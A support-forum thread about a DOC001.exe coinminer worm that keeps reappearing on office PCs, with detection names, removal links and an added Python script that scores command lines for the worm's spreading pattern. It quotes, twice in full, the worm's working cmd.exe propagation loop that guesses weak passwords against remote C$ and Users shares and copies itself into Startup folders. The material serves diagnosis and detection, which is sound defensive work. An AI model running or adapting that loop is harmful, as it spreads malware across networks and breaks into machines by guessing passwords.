
Malware



  • Administrators

Is that "DC002. Exe" a name of a file? Is it detected by ESET? If not, please submit it to ESET for analysis as per FAQ on the right-hand side of this forum.


  • Administrators

Have you also submitted logs as per the KB I referred to? Just knowing the file name doesn't tell anything.


If the file is DOC001.exe, it is possible the .exe is a coinminer: https://malwaretips.com/blogs/remove-doc001-exe/ .

The first question is how did you know you were infected? Do you have Eset installed and it detected something? If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware.


  • Administrators

So is it detected by ESET or not? If it is, under what name? If not, please submit it to samples[at]eset.com in an archive encrypted with the password "infected".


Quote

The first question is how did you know you were infected?

I saw that drive C of most computers has that folder. Even if you delete it, it will re-appear again.

Quote

Do you have Eset installed and it detected something?

I have Eset installed but it's not detecting.

Quote

If so, there should be an entry or entries in Eset Detection log related to this detection. You need to copy those detection entries and post them in this thread so we can identify the malware.


Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

1 hour ago, Gerald KAmande said:

https://malwaretips.com/blogs/remove-doc001-exe/ . I have tried it; it detects, but the virus will still hit on those PCs.

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?

Quote

When the scan has completed, you will be presented with a screen showing the malware infections that Malwarebytes has detected. To remove the malicious programs that Malwarebytes has found, click on the “Quarantine Selected” button.


Edited by itman

There's a May 4, 2019 analysis of DOC001.exe at Malware-Analysis here: https://www.hybrid-analysis.com/sample/f23435192769e92a832e8eba0dd769fc50e23fb41f11cd647ea2c550520f2f68?environmentId=100 . AV detection of the malware is quite high. And it does maintain persistence in the various Win startup locations as noted below. Appears it has loaded itself into every one of them!

Quote

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ПК=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temps\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin администратор) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 652)

cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) do set str_!random!=%i)& for /f "usebackq tokens=1* delims==" %j in (`set str_`) do set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ПК=!& set f=DOC001.exe& if not "!s!"=="%COMPUTERNAME%" (for /f "usebackq tokens=1,*" %j in (`net view \\!s!^|find /i " "`) do echo f|xcopy /y /d "%APPDATA%\Temp\DOC001.exe" "\\!s!\%j\DOC001.exe") & net use * /delete /y & (for %u in (1 !l! administrator user admin администратор) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & (for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && ((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temp\DOC001.exe" %d) & net use %c /delete /y & ping -n 20 localhost))) (PID: 3880)


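The two sandbox command lines above are the whole propagation loop: enumerate neighbours with `net view` / `arp -a`, try a short list of user names and passwords against `\\host\C$` and `\\host\Users` with `net use`, then `xcopy` DOC001.exe into every Startup folder it can reach. The script below is an added example (not code from the original posters, ESET or hybrid-analysis) that scores process-creation command lines for that pattern so a hunt over endpoint telemetry surfaces the spreader rather than just the dropped file. The log line format, the indicator weights, the alert threshold and the four sample events are constructed assumptions; tune the weights against your own baseline.

```python
"""Score process-creation command lines for the SMB / Startup-folder
propagation pattern seen in the DOC001.exe sandbox report.

Added example for this thread, not code from ESET, hybrid-analysis or the
original posters. Log format, weights, threshold and sample events are
constructed assumptions.
"""
import re

# (name, pattern, weight). Weights are chosen so that no single generic
# admin command (a lone `net view`, a lone `xcopy`) crosses the threshold.
INDICATORS = [
    # Neighbour enumeration via share listing or ARP cache dump.
    ("host_discovery", re.compile(r"\bnet\s+view\b|\barp\s+-a\b", re.I), 1),
    # Mount a remote share with explicit credentials.
    ("share_mount", re.compile(r"\bnet\s+use\b[^&]*?/user:", re.I), 2),
    # Paths under another host's C$, ADMIN$ or Users share.
    ("admin_share", re.compile(r"\\\\[^\\\s]+\\(C\$|ADMIN\$|Users)(?!\w)", re.I), 2),
    # A Startup folder as a destination = autorun persistence.
    ("startup_path", re.compile(r"Start Menu\\Programs\\Startup", re.I), 2),
    ("file_copy", re.compile(r"\b(xcopy|copy|robocopy)\b", re.I), 1),
    # Batch loop variables substituted for BOTH password and user name,
    # i.e. `net use <share> "%p" /user:"%u"`: credential guessing.
    ("cred_guess", re.compile(r'\bnet\s+use\b[^&]*"%\w"\s+/user:"%\w"', re.I), 3),
    ("known_name", re.compile(r"\bDOC001\.exe\b", re.I), 3),
]
ALERT_THRESHOLD = 6  # assumption: tune against your own baseline


def assess(cmdline):
    """Return (score, [indicator names]) for one command line."""
    hits = [name for name, pat, _w in INDICATORS if pat.search(cmdline)]
    score = sum(w for name, _p, w in INDICATORS if name in hits)
    return score, hits


def is_suspicious(cmdline):
    return assess(cmdline)[0] >= ALERT_THRESHOLD


def hunt(log_lines):
    """Constructed log format: '<ts> <host> pid=<n> cmd=<command line>'.
    Returns one dict per event at or above ALERT_THRESHOLD."""
    alerts = []
    for line in log_lines:
        head, _, cmd = line.partition(" cmd=")
        if not cmd:
            continue  # malformed or not a process-creation event
        ts, host, pid = head.split()
        score, hits = assess(cmd)
        if score >= ALERT_THRESHOLD:
            alerts.append({"ts": ts, "host": host, "pid": pid[len("pid="):],
                           "score": score, "indicators": hits})
    return alerts


# Constructed sample: a trimmed copy of the spreader command line above.
SAMPLE_WORM = (
    r'cmd.exe /v:on /c (for /f "usebackq tokens=1,*" %i in (`net view^|find /i "\\" ^|^| arp -a^|find /i " 1"`) '
    r'do set str_!random!=%i)& set f=DOC001.exe& '
    r'(for %u in (1 !l! administrator user admin) do @for %p in (0 "" %u 1 123) do ping -n 3 localhost & '
    r'(for %c in (\\!s!\C$ \\!s!\Users) do (if not "%p%u"=="01" net use %c "%p" /user:"%u") && '
    r'((for %d in ("%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!") do '
    r'echo f|xcopy /y /d "C:\Users\%USERNAME%\AppData\Roaming\Temps\DOC001.exe" %d) & net use %c /delete /y)))'
)

# Constructed events: one spreader plus three benign admin commands that each
# trip one or two indicators but stay under the threshold.
SAMPLE_LOG = [
    "2019-05-04T10:00:01Z PC-01 pid=652 cmd=" + SAMPLE_WORM,
    "2019-05-04T10:00:05Z PC-02 pid=1200 cmd=cmd.exe /c net view",
    r"2019-05-04T10:00:09Z PC-03 pid=1311 cmd=xcopy /y \\fileserver\C$\logs D:\logs",
    r"2019-05-04T10:00:12Z PC-04 pid=1402 cmd=net use Z: \\fileserver\share /user:corp\alice",
]

if __name__ == "__main__":
    for alert in hunt(SAMPLE_LOG):
        print(alert)
```

Only the PC-01 event is reported: the spreader scores 14 (every indicator fires), while `net view` alone scores 1, the `xcopy` from a C$ share scores 3 and the mapped drive with `/user:` scores 2. The `cred_guess` pattern is the most specific signal here, because a legitimate script does not feed both the password and the user name from batch loop variables.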

19 hours ago, itman said:

Submit doc001.exe to VirusTotal: https://www.virustotal.com/#/home/upload and see what security solutions there detect it.  

Are you stating MBAM detects and removes the malware but it reappears? If so, when does it reappear? After a system restart?

Also after MBAM detected the malware, did you do this?


I have uploaded the file; see the attached results.

[attached screenshot of the scan results]


  • Administrators

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan
NsCpuCNMiner32.exe - a variant of Win32/CoinMiner.DQ potentially unwanted application
NsCpuCNMiner64.exe - a variant of Win64/CoinMiner.CZ potentially unwanted application

The first one is an NSIS archive, the detection was added in April 2018. The other 2 executables (PUAs) are inside the NSIS archive, the detection was added in July 2017.


1 hour ago, Marcos said:

0b36728a48fbff17a45be400c628052e6dca95fc - NSIS/CoinMiner.T trojan

TrendMicro has an article on how to permanently remove this coinminer here: https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/worm_coinminer.inj . It does require some manual cleaning activities. Click on the "Solution" section. Substitute the "scan with TrendMicro" with a full in-depth scan using Eset Smart Security. 

If the above is too technically advanced for you, contact your regional Eset support concern for assistance: https://www.eset.com/int/


For reference, SANS has an article on a malware sample using the NSIS installer here: https://isc.sans.edu/forums/diary/Quick+analysis+of+malware+created+with+NSIS/23703/ .

I believe this particular coinminer malware was deployed via a self-executing SFX archive using something along this line: https://gist.github.com/xymopen/951ef3d5301af55efd82eb67af129066 .

Make sure Eset's PUA protection is always enabled and don't ignore the warnings generated from it. It is far easier to prevent malware/nuisance-ware from being installed than trying to remove it later. 

Edited by itman

This topic is now closed to further replies.